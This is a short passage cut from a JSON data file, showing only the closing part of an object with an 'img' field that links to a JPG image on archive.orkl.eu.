		"img": "https://archive.orkl.eu/db56e7016c89ff29a90db58668fa95512536daca.jpg"
	}
}